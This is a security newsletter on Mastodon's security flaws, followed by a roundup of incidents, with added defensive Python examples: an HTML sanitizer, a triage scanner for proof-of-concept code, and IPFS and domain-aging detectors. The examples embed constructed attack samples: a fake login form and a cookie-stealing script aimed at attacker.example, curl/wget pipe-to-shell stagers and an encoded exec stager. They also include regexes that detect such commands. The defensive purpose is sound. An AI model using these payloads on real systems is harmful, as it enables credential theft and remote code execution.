Mastodon comes under the security lens
Twitter alternatives have been found to contain several issues
A number of platform changes introduced by Twitter’s chief executive Elon Musk have sent users flocking to a decentralized social media service called Mastodon. But the latter’s new-found popularity has also led researchers to uncover a number of security holes.
But before you migrate, here’s what you need to know. First, setting up an account requires users to choose from a set of servers (or instances), which cater to a wide range of topics. You also have the option to move between instances but it’s possible the same username isn’t available.
That’s because Mastodon follows a federated design: the ecosystem, collectively known as the fediverse, is built on a set of independently operated, interconnected servers. There is no single central site that holds all of the users’ data.
This also means that rules are not uniformly enforced across the entire platform; each instance sets its own policies to define its space, including the default language, content moderation guidelines, topics, and privacy settings. It also has privacy consequences: a direct message is just a post with restricted visibility, stored on the servers involved, so sending one to a user on a different server lets the administrators of that server (as well as those of your own) view the message. Mastodon does not end-to-end encrypt messages.
The influx has also prompted the security community to take a closer look at Mastodon. PortSwigger’s Gareth Heyes found that the infosec.exchange instance was affected by an HTML injection vulnerability: the instance allowed users to post HTML that was not properly sanitized, so an attacker could have injected markup into a post to steal credentials stored in users’ browsers.
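The defence against that class of bug is an allowlist sanitizer on the server: every tag and attribute the product does not explicitly need is dropped before the post is stored or rendered, so a credential-harvesting form or a script never reaches other users’ browsers. The following is an added illustration written in Python on the standard library, not Mastodon’s own (Ruby) sanitizer; the allowlists, the `sanitize_post` function and the attack payload are all constructed for this example.

```python
"""Allowlist sanitizer for user-posted HTML (standard library only).

Added illustration of the defence against HTML injection in user posts.
Anything not on the allowlist is removed; forms, inputs and scripts never
reach the rendered page.  Not Mastodon's own sanitizer.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "a", "strong", "em", "code", "pre", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}       # everything else (style, on*, name, ...) is dropped
VOID_TAGS = {"br"}                     # emitted without a closing tag
# Elements whose *content* must be discarded too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "form", "iframe", "object", "noscript"}
SAFE_HREF_SCHEMES = ("http://", "https://", "mailto:")


class PostSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []          # sanitized output fragments
        self.open_tags = []      # allowed tags currently open, keeps output well-formed
        self.discard_depth = 0   # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.discard_depth:
            if tag in DROP_WITH_CONTENT:
                self.discard_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.discard_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                       # unknown tag: drop it, keep its text
        rendered = [f"<{tag}"]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_SCHEMES):
                continue                 # blocks javascript:, data:, vbscript: ...
            rendered.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "a":
            rendered.append(' rel="nofollow noopener"')
        rendered.append(">")
        self.parts.append("".join(rendered))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.discard_depth:
            if tag in DROP_WITH_CONTENT:
                self.discard_depth -= 1
            return
        if tag in VOID_TAGS or tag not in self.open_tags:
            return
        while self.open_tags:            # also closes anything left open inside this tag
            closed = self.open_tags.pop()
            self.parts.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.discard_depth:
            self.parts.append(escape(data))   # text is always re-escaped

    def result(self):
        while self.open_tags:            # close tags the author left open
            self.parts.append(f"</{self.open_tags.pop()}>")
        return "".join(self.parts)


def sanitize_post(html: str) -> str:
    """Return a version of *html* containing only allowlisted markup."""
    parser = PostSanitizer()
    parser.feed(html)
    parser.close()
    return parser.result()


# Constructed attack payload: a login form pointed at an attacker host, a script
# that exfiltrates cookies, and a javascript: link, mixed with ordinary formatting.
MALICIOUS_POST = (
    '<p>Hi <b onclick="x()">there</b>'
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="username"><input type="password" name="password">'
    '<button>Log in</button></form>'
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(1)">x</a>'
    '<a href="https://example.org">ok</a></p>'
)

if __name__ == "__main__":
    print(sanitize_post(MALICIOUS_POST))
```

The design point is that the sanitizer is an allowlist, not a blocklist: a new dangerous element or attribute added to browsers later is rejected by default, whereas a blocklist has to be updated to catch it.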
A separate misconfiguration in the same instance, identified by Lenin Alevski, could have been exploited to download or delete all of the files stored on the server, including files shared through direct messages.
“Whether Mastodon serves to replace or only supplement Twitter, there’s certainly advantages to be had in the platform’s ad-free, decentralized structure, as well as some challenges for both new users and servers,” cybersecurity company SentinelOne noted last month.
In the meantime, another Twitter alternative called Hive that witnessed a surge in users since Musk took over said it’s temporarily shutting down after researchers found vulnerabilities that would have let hackers access DMs and edit others’ Hive posts.
The rapidly growing user base on Mastodon, Hive, and Post further poses security and moderation challenges, not to mention raising questions about how these emerging platforms would respond to law enforcement requests for data.
What’s trending in security?
🚨 Microsoft is raising an alarm that systems using the long-discontinued Boa web server could be at risk of large-scale cyberattacks, after a series of intrusion attempts against power grid facilities in India likely involved exploiting unpatched security flaws in the software to deploy the ShadowPad backdoor. Boa has not been maintained since 2005 but continues to be bundled in popular software development kits (SDKs) that Internet of Things (IoT) device developers use when building critical components for myriad devices. These include SDKs released by Realtek that ship with SoCs supplied to companies that manufacture gateway devices such as routers, access points, and repeaters. [The Hacker News / The Record]
↘️ Researchers at the Leiden Institute of Advanced Computer Science found 4,893 repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities discovered in 2017-2021, some of them including malware. “They attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system,” according to the researchers. [ArXiv]
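Before running any PoC pulled from a public repository, it is worth a quick static pass for the indicators that separate a working exploit from a trojanised one: hard-coded addresses that are not lab ranges, large base64 blobs hiding a second stage, and download-and-execute one-liners. The script below is an added example of such a triage pass, not the Leiden researchers’ tooling; the sample “repository” (two files), the `LAB_NETWORKS` allowlist and the regexes are constructed here, and `203.0.113.5` is a documentation address standing in for an attacker host.

```python
"""Static triage of a downloaded proof-of-concept exploit before running it.

Added illustration; not the Leiden researchers' tooling.  It flags hard-coded
addresses outside lab ranges, large base64 blobs that hide a second stage, and
download-and-execute one-liners.  The sample repository is constructed inline.
"""
import base64
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A run of >= 60 base64 characters plus optional padding, not part of a longer token.
BASE64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{60,}={0,2}(?![A-Za-z0-9+/=])")
DOWNLOAD_EXEC_RE = re.compile(
    r"(?:curl|wget)\b[^\n|;]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
    r"|powershell[^\n]*(?:-enc\b|-encodedcommand|downloadstring|\biex\b)",
    re.IGNORECASE,
)
# Addresses a PoC may legitimately reference: loopback, RFC 1918 and link-local.
LAB_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]


def external_ips(text):
    """IPv4 literals in *text* that point outside the lab ranges above."""
    hits = []
    for literal in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(literal)
        except ValueError:               # e.g. 999.1.1.1 matched by the loose regex
            continue
        if not any(ip in net for net in LAB_NETWORKS):
            hits.append(literal)
    return hits


def decoded_blobs(text, min_len=32):
    """Base64 runs that decode cleanly to at least min_len bytes."""
    blobs = []
    for run in BASE64_RE.findall(text):
        try:
            data = base64.b64decode(run, validate=True)
        except ValueError:               # binascii.Error is a ValueError subclass
            continue
        if len(data) >= min_len:
            blobs.append(data)
    return blobs


def triage_file(text):
    """Return a list of human-readable findings for one source file."""
    findings = [f"hard-coded external address {ip}" for ip in external_ips(text)]
    if DOWNLOAD_EXEC_RE.search(text):
        findings.append("download-and-execute command")
    for blob in decoded_blobs(text):
        decoded = blob.decode("utf-8", errors="replace")
        note = f"base64 blob of {len(blob)} bytes"
        # Look inside the blob too: stagers are usually hidden behind the encoding.
        if DOWNLOAD_EXEC_RE.search(decoded) or external_ips(decoded):
            note += " that decodes to another stager"
        findings.append(note)
    return findings


def triage_repository(files):
    """Map each filename to its findings; an empty list means nothing was flagged."""
    return {name: triage_file(text) for name, text in files.items()}


# --- constructed sample repository ------------------------------------------
# 203.0.113.0/24 is a documentation range standing in for a real attacker host.
STAGER = b"import os; os.system('curl -s http://203.0.113.5/stage2 | sh')"
SAMPLE_REPO = {
    # Plausible PoC: only ever talks to a lab target.
    "poc.py": (
        "import socket\n"
        "TARGET = ('192.168.56.101', 8080)\n"
        "payload = b'A' * 1024 + b'\\x41\\x42\\x43\\x44'\n"
        "s = socket.create_connection(TARGET)\n"
        "s.sendall(payload)\n"
    ),
    # Trojanised PoC: same skeleton plus a hidden second stage.
    "exploit.py": (
        "import base64, os, socket\n"
        "TARGET = ('192.168.56.101', 8080)\n"
        f"_cfg = '{base64.b64encode(STAGER).decode()}'\n"
        "exec(base64.b64decode(_cfg))\n"
        "os.system('wget -qO- http://203.0.113.5/x.sh | bash')\n"
    ),
}

if __name__ == "__main__":
    for name, findings in triage_repository(SAMPLE_REPO).items():
        print(name, findings or ["clean"])
```

A clean result is not proof of safety (the paper’s point is that some of these repositories are outright malware), so the script is a first filter before the PoC goes into an isolated VM, not a substitute for one.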
⏫ Microsoft has warned that cybercrime-as-a-service (CaaS) is a growing and evolving threat to customers worldwide, adding that nation-state actors are pursuing new and unique tactics to deliver attacks and evade detection, including compromising IT and firmware supply chains and exploiting zero-day flaws. “The commoditization of exploits is leading them to come at a much faster rate,” the tech giant said. “Zero-day exploits are often discovered by other actors and reused broadly in a short period of time.” [The Hacker News]
🔗 A booby-trapped VPN application is being used to load spyware on Android devices as part of an operation aimed at Iran’s Baha’i community, a persecuted, Persian-speaking minority group. The campaign is just the latest in a growing list of espionage efforts involving advanced infrastructure and mobile surveillanceware. [The Hacker News]
📱 Almost half of Android-based mobile phones used by U.S. state and local government employees are running outdated versions of the operating system, exposing them to hundreds of vulnerabilities that can be leveraged for attacks. “Because government entities often delay OS updates to test their proprietary apps, it creates a window for attackers to exploit those vulnerabilities,” the report says. “Some of the potential effects include remote code execution, UI spoofing, and user activity tracking.” [Lookout]
🏦 At least 16 African banks, financial services, and telecommunication companies have been identified as victims of the French-speaking threat group OPERA1ER, which has stolen at least $11 million since 2018. The group doesn’t rely on exotic malware; its hallmark is the use of easily accessible open source malware and everyday red-team frameworks like Metasploit and Cobalt Strike. [The Hacker News]
⚠️ Threat actors are leveraging the InterPlanetary File System (IPFS), a peer-to-peer distributed file storage protocol in which content is addressed by a hash of its contents rather than by the server that hosts it, to host phishing pages and distribute malicious payloads. Any node holding a copy can serve a file, and public gateways will fetch it on a visitor’s behalf, so content stays reachable as long as at least one node keeps a copy; removing it from one host achieves little, which makes takedowns far harder than for a conventionally hosted page. [The Hacker News / Decipher]
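A practical consequence for defenders: the same phishing page is reachable through any public gateway (path style `https://<gateway>/ipfs/<cid>/…`, subdomain style `https://<cid>.ipfs.<gateway>/…`, or the native `ipfs://` scheme), so blocking one gateway hostname is trivially bypassed, whereas keying detection on the content identifier (CID) catches every gateway. The code below is an added example of that normalisation, not code from the cited reports. The proxy log format, the two CIDs and the user names are constructed, and the CID regex is a practical approximation rather than a full multiformats parser.

```python
"""Normalise IPFS links from a proxy log to their content identifier (CID).

Added illustration, not code from the cited reports.  Grouping fetches by CID
rather than by gateway hostname shows every path to the same hosted page.
The log below is constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Approximation of the two common CID encodings (not a full multiformats parser):
# CIDv0 is 46 base58 chars starting "Qm"; CIDv1 is usually lowercase base32 starting "b".
CID = r"(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{58,})"
CID_FULL_RE = re.compile(rf"^{CID}$")
PATH_RE = re.compile(rf"^/ipfs/({CID})(?=/|$)")            # https://gateway/ipfs/<cid>/...
SUBDOMAIN_RE = re.compile(rf"^({CID})\.ipfs\.[A-Za-z0-9.-]+$")  # https://<cid>.ipfs.gateway/...


def ipfs_cid(url):
    """Return the CID addressed by *url*, or None if it is not an IPFS link."""
    parts = urlsplit(url)
    host = parts.netloc.rsplit("@", 1)[-1].split(":")[0]     # strip userinfo and port
    if parts.scheme == "ipfs" and CID_FULL_RE.match(host):   # ipfs://<cid>/...
        return host
    m = SUBDOMAIN_RE.match(host)
    if m:
        return m.group(1)
    m = PATH_RE.match(parts.path)
    if m:
        return m.group(1)
    return None


def group_by_cid(log_text):
    """Map each CID seen in the log to the (user, url) pairs that fetched it."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, user, _method, url = line.split()
        cid = ipfs_cid(url)
        if cid:
            hits[cid].append((user, url))
    return dict(hits)


# Constructed log, one "<timestamp> <user> <method> <url>" per line.  Both CIDs are made up.
CID_V1 = "bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi"
CID_V0 = "QmT78zSuBmuS4z925WZfrqQ1qHaJ56DQaTfyMUF7F8ff5o"
SAMPLE_LOG = f"""
2022-11-14T09:12:01Z alice GET https://ipfs.io/ipfs/{CID_V1}/login.html
2022-11-14T09:12:44Z bob GET https://{CID_V1}.ipfs.dweb.link/login.html
2022-11-14T09:13:10Z carol GET https://cloudflare-ipfs.com/ipfs/{CID_V0}/index.html
2022-11-14T09:13:55Z dave GET ipfs://{CID_V0}/index.html
2022-11-14T09:14:02Z erin GET https://example.org/ipfs/notes/page.html
"""

if __name__ == "__main__":
    for cid, fetches in group_by_cid(SAMPLE_LOG).items():
        print(cid, [user for user, _ in fetches])
```

Once a CID is confirmed as a phishing kit, the same function turns any new gateway URL into a match against the existing indicator, so the blocklist does not have to grow with every gateway the attacker rotates through.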
🌀 The U.S. reissued sanctions on Tornado Cash, accusing the platform of helping North Korean government hackers launder hundreds of millions of dollars to help fund North Korea’s nuclear weapons program. “The use of Tornado Cash to launder stolen funds represents a larger trend by the DPRK regime to resort to illicit activities, including cyber-enabled heists from virtual currency exchanges and financial institutions, to generate revenue for its unlawful WMD and ballistic missile programs,” the U.S. State Department said. [U.S. State Department]
📧 An Instagram influencer known as “Hushpuppi,” a 40-year-old Nigerian named Ramon Olorunwa Abbas, has been sentenced to 11 years in prison for conspiring to launder tens of millions of dollars from business email compromise (BEC) scams and various cyber schemes, including providing assistance to North Korean hackers following a cyber-heist targeting a bank in Malta in January 2019. Abbas was arrested in Dubai, UAE, in June 2020 and pleaded guilty to money laundering charges in April 2021. [U.S. Department of Justice]
💵 Texas-based IT management solutions provider SolarWinds agreed to pay $26 million to settle a shareholder lawsuit over the data breach disclosed by the company in 2020, the company revealed in a filing on October 28, 2022. The cyberattack involved Russia-linked threat actors dubbed Nobelium breaching SolarWinds systems as far back as 2019. The breach, however, only came to light in December 2020. [U.S. Securities and Exchange Commission]
📝 Microsoft subsidiary GitHub has launched a private vulnerability reporting capability that allows security researchers to file vulnerabilities directly with maintainers of open source projects. The development comes as the U.S. National Security Agency (NSA) released guidance encouraging organizations to shift from programming languages like C and C++ to memory-safe alternatives, namely C#, Rust, Go, Java, Ruby or Swift. [GitHub / NSA]
⤵️ A malicious browser extension that works on both Google Chrome and Microsoft Edge has been found to let attackers remotely take over a victim’s browser session and carry out a wide range of nefarious activity, including stealing cookies, mining cryptocurrency, and installing other malware. Concerningly, the Cloud9 malware is designed to target all browsers and operating systems, giving it a broad reach. [The Hacker News]
🔓 Google has paid out $70,000 to security researcher David Schütz for privately reporting an “accidental” security bug, a case of local privilege escalation, that allowed anyone to unlock fully patched Google Pixel phones without knowing the passcode. Schütz found that anyone with physical access to a Pixel could swap in their own SIM card and enter that SIM’s PUK recovery code to bypass the operating system’s lock screen protections. [The Hacker News]
💳 Seven different Magecart groups are taking advantage of a flaw in Magento 2 (CVE-2022-24086, CVSS score: 9.8) to take over vulnerable e-commerce sites as part of an ongoing campaign called TrojanOrder. The issue was patched by Adobe in February 2022. [Sansec]
💰 Russian hacktivists have compromised several organizations in Ukraine with a new ransomware strain called Somnia, amid continuing cyberattacks on the nation. [CERT-UA / BBC]
👀 A new report from The Intercept has revealed details about the Iranian government’s far-reaching digital surveillance tools, uncovering how officials partner with mobile carriers to track cell phone users, and monitor, alter, and disrupt their communications. This includes a tool called SIAM that can be used to “slow their data connections to a crawl, break the encryption of phone calls, track the movements of individuals or large groups, and produce detailed metadata summaries of who spoke to whom, when, and where.” [The Intercept]
🔄 Apple made it official that it commits to fully patching only the latest version of its operating systems, stating that “not all known security issues are addressed in previous versions.” The company uses the term “upgrade” to refer to major OS releases that can add big new features and user interface changes, and “update” to refer to smaller but more frequently released patches that mostly fix bugs and address security problems. [Apple]
👑 A threat actor tracked by Microsoft as DEV-0569 has been linked to a Google Ads campaign designed to deliver artifacts that ultimately enable the deployment of Royal ransomware. The group has drawn attention for its ability to continuously improve its discovery, detection evasion, and post-compromise payloads. In just a few months, the threat actor used a variety of methods, including hiding malicious links on organizations’ contact forms; burying fake installers on legitimate download sites and repositories; and using Google ads in its campaigns to camouflage its malicious activities. [The Hacker News]
📩 Malicious operations using Emotet resumed this month at a high volume, putting an end to a four-month-long hiatus. Emotet was created as a banking trojan in 2014 to steal financial data, but it has since evolved into a malware dropper capable of delivering next-stage payloads. Emotet-laden email samples employ generic lures to trick users into opening sketchy Excel files that activate the kill chain. [The Hacker News]
🔑 Threat actors are stealing authentication tokens already verified by multifactor authentication (MFA) to breach organizations’ systems. “By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly,” Microsoft said. [Microsoft]
🚩 Researchers at Unit 221B discovered security vulnerabilities in the encryption mechanism of the Zeppelin ransomware, enabling the recovery of data for close to two-dozen victims without paying the ransom. The ransomware gang “appears to have stopped spreading their ransomware code gradually over the past year,” possibly as a result of its failed encryption. [Unit221B / Krebs on Security]
🪙 James Zhong pleaded guilty to stealing 50,000 bitcoins from the Silk Road dark web marketplace before it was busted by U.S. law enforcement in 2013. Zhong exploited a bug in Silk Road’s payments system that allowed him to siphon bitcoin to his own wallets. [The Hacker News / WIRED]
🗞️ Details emerged about a mass media compromise that involved an initial access broker, aka TA569, hacking an unnamed media content provider to deploy malware on hundreds of U.S. news outlet websites. The goal of the spray-and-pray supply chain attack is to trick visitors into installing a fake browser update that eventually delivers malware, usually ransomware. [Bleeping Computer]
📶 Ever wonder what it’s like to receive two-factor authentication codes via SMS if you happen to be in Antarctica? Let’s just say, it’s difficult! [brr]
📞 In case you missed it, Facebook has a little-known feature that lets you check whether your email address or phone number has been uploaded to the social network by someone else, delete it, and then block it from being uploaded again. This matters because Facebook lets users sync their phone contacts, which ends up uploading other people’s information without their consent. In related news, Meta said it disciplined more than two dozen employees and contractors over the past year for illicitly accessing user accounts, in some cases accepting bribes to do so. The development also comes as Facebook is attracting criticism for doing little to help users recover accounts. [The Hacker News]
📍 A stalkerware app called TheTruthSpy is said to have compromised at least 360,000 devices worldwide. The database included GPS location data points, call logs, and text messages. [TechCrunch]
👄 Developers of the open source Matrix messenger protocol have released an update to fix critical end-to-end encryption bugs that undermine its authentication and confidentiality guarantees. The compromise relies on a malicious or compromised server, enabling a “malicious server operator or someone who gains control of a Matrix server to read the messages of users and to impersonate them to each other.” [Ars Technica]
📰 The operators behind the information-stealing malware known as Ducktail have adapted their tactics and malware to avoid detection. The goal of the malware is to hijack Facebook Business accounts associated with individuals in the marketing and advertising sectors. Since a business account can be associated with multiple email addresses with different permission levels, the attacks target users with administrator and finance editor roles so as to steal their account information, enabling the actor to add their own email addresses and profit off ads. [The Hacker News]
👾 Attention is being drawn to a new commercial red-teaming tool called Nighthawk, warning that the command-and-control framework is likely to be appropriated by malicious actors, joining the likes of Cobalt Strike, Sliver, and Brute Ratel C4. MDSec said it is not aware of any evidence of illegitimate activity associated with the software, adding it offers a “layered mix of soft and technical controls” to prevent misuse. [The Hacker News]
❗ A growing number of cybercriminal groups are turning to a Go-based information stealer named Aurora to steal data from compromised machines. Also observed in the wild is another stealer called Typhon Reborn, an updated version of a crypto miner and stealer that has been spotted with capabilities to siphon from crypto wallets and evade antivirus products. It’s being sold for $100 for a lifetime license. [The Hacker News]
🕸️ Meta took down a network of phony Facebook and Instagram accounts that promoted pro-U.S. messages abroad, targeting audiences in Afghanistan and Central Asia. Meta said the cluster was operated by people associated with the U.S. military but did not attribute it to a specific U.S. military command. The fraudulent accounts claimed, among other things, that the U.S. was key to the region’s stability, while also raising terrorism concerns in the targeted regions and spreading posts critical of China, Iran, and Russia. [The Hacker News]
💲 The Black Basta ransomware group, one of this year’s most prolific ransomware families, is using Qakbot malware — also known as QBot or Pinkslipbot — to perpetrate an aggressive and widespread campaign targeting U.S. companies. What’s also notable is the swiftness with which the attacks are taking place, with the ransomware deployed in less than half a day. Evidence has recently emerged that the FIN7 group may be backing the criminal gang.
FIN7 is a financially motivated cybercrime organization that is estimated to have stolen well over $1.2 billion since surfacing in 2012. FIN7 has also been suspected of links to DarkSide, BlackMatter, and BlackCat. Analysis of the ransomware activities has revealed a well-organized and well-resourced operator that does not attempt to recruit affiliates, indicating that the threat actor is developing its toolkit in-house and might be collaborating with a small number of affiliates. [The Hacker News]
💥 An analysis of several wiper families that threat actors deployed in various attacks since the start of the year, most of them targeting Ukraine, has found the malware to be an effective tool in cyberattacks regardless of the technical skills of the adversary. “The required time to create such a piece of malware is low, especially when compared to complex espionage backdoors and the often-accompanying vulnerabilities that are used,” researcher Max Kersten said. [Trellix]
🔐 Internet Security Research Group (ISRG), the nonprofit behind Let’s Encrypt, said the open certificate authority (CA) has issued its three billionth certificate this year. More than 309 million domains are being secured using the free service. [ISRG]
🔍 A Spanish IT firm has been seemingly behind an invasive spyware framework called Heliconia that targeted desktop computers, exploiting vulnerabilities in Chrome, Windows Defender, and Firefox to deploy spyware on target devices, including Windows and Linux computers. [The Hacker News / WIRED]
📢 LastPass said it was breached a second time using information obtained during the August intrusion, although it emphasized that user passwords were safe. The new incident at LastPass is an indication that the attackers may have accessed more data from the company in August 2022 than previously thought. [The Hacker News]
🚫 Major web browsers such as Mozilla Firefox and Microsoft Edge said they would stop trusting new certificates issued by TrustCor Systems after an investigation found the company’s links to another firm called Packet Forensics that sells communication interception services to U.S. government agencies. [The Washington Post]
⬇️ Google said the number of memory safety vulnerabilities in Android fell from 223 in 2019 to 85 in 2022, coinciding with its shift from writing new code in C/C++ to writing it in Rust; Android 13 is the first release in which the majority of new code is in a memory-safe language. [Security Blog]
🌐 SocGholish, malicious JavaScript distributed via drive-by downloads from compromised but otherwise legitimate websites, masquerades as a fake browser update that, when downloaded, launches a malicious payload for follow-on attacks. It’s attributed to a threat actor tracked as TA569. “Regardless of the victim’s profile, TA569 is extremely aggressive in deploying follow-on malware leading to a remarkably low dwell time,” researchers say. [Proofpoint / Sucuri]
❌ A sophisticated threat actor named “CashRewindo” has taken an unusually crafty approach by using a technique called domain aging in global malvertising campaigns that lead to investment scam sites. Domain aging is a method where threat actors register domains and wait years (in this case, two) to use them, hoping to bypass security platforms. [Confiant]
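Domain aging defeats the common “newly registered domain” rule because, on paper, the domain is years old. What does still stand out is the gap between registration and first observed use: a domain registered two years ago that only began resolving or serving content in the last few weeks, and then immediately shows up as an ad landing page, behaves like a new domain in every way except its WHOIS date. The following is an added example of that check, not Confiant’s detection logic; the record fields, the thresholds and the three sample domains are constructed for illustration.

```python
"""Flag "aged" domains: registered long ago, dormant, then suddenly put to use.

Added illustration, not Confiant's detection logic.  A newly-registered-domain
rule misses a domain parked for two years before being pointed at a scam site,
so this rule looks at the gap between registration and first observed activity
instead.  All records are constructed.
"""
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class DomainRecord:
    name: str
    registered: date      # WHOIS / RDAP creation date
    first_active: date    # first time DNS or web telemetry saw it resolve or serve content
    first_in_ads: date    # first time it appeared as a landing page in an ad creative


def classify(rec, dormant_min=timedelta(days=365), fresh_max=timedelta(days=30)):
    """Return 'newly-registered', 'aged-dormant' or 'established'."""
    dormancy = rec.first_active - rec.registered        # how long it sat unused
    in_use_before_ads = rec.first_in_ads - rec.first_active
    if rec.first_in_ads - rec.registered <= fresh_max:
        return "newly-registered"       # the usual NRD rule already catches this
    if dormancy >= dormant_min and in_use_before_ads <= fresh_max:
        return "aged-dormant"           # old on paper, brand new in practice
    return "established"


def flag_aged(records):
    """Names of the records that match the aged-dormant pattern."""
    return [r.name for r in records if classify(r) == "aged-dormant"]


# Constructed records; .example is a reserved TLD.
SAMPLE = [
    DomainRecord("fresh-invest.example", date(2022, 11, 1), date(2022, 11, 2), date(2022, 11, 10)),
    DomainRecord("parked-since-2020.example", date(2020, 10, 5), date(2022, 11, 1), date(2022, 11, 15)),
    DomainRecord("trusted-news.example", date(2015, 3, 2), date(2015, 3, 9), date(2022, 11, 12)),
]

if __name__ == "__main__":
    for rec in SAMPLE:
        print(f"{rec.name:28} {classify(rec)}")
```

The rule depends on having passive DNS or web telemetry that goes back further than the attacker’s waiting period; without a record of the dormant years, an aged domain is indistinguishable from an established one.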
🔓 A trojanized variant of a legitimate open source application called ResignTool, which is used to change the signing information on .ipa archive files, has been found to steal iCloud Keychain data from macOS systems, including passwords, private keys, and certificates. [Trend Micro]